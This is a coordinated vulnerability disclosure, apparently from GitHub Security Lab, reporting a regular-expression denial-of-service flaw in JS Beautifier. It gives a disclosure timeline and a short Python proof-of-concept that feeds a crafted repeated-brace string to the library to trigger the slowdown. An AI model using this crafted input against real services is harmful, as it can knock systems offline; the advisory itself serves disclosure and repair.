Coordinated Disclosure Timeline
- 2021-08-31: Sent report to bitwiseman@beautifier.io
- 2021-10-14: They have code scanning enabled, so this bug is listed in their code scanning results.
- 2021-10-14: Sent a follow-up email to bitwiseman@beautifier.io with my suggested fix.
- 2021-11-30: Disclosure deadline expired.
- 2021-12-06: Created a pull request to fix the bug, but it turned out that my fix was incorrect.
- 2021-12-09: Created a new pull request to fix the bug, which was successful.
Summary
JS Beautifier contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
JS Beautifier
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions.
Vulnerability
The vulnerable regular expression is here.
Please follow these steps to reproduce the issue:
- Install jsbeautifier:
pip3 install jsbeautifier - Run the below with
python3:
import jsbeautifier
str = '''
return <- {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {>
'''
print(jsbeautifier.beautify(str, {'e4x': True}))
Impact
This issue may lead to a denial of service.
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-113 in any communication regarding this issue.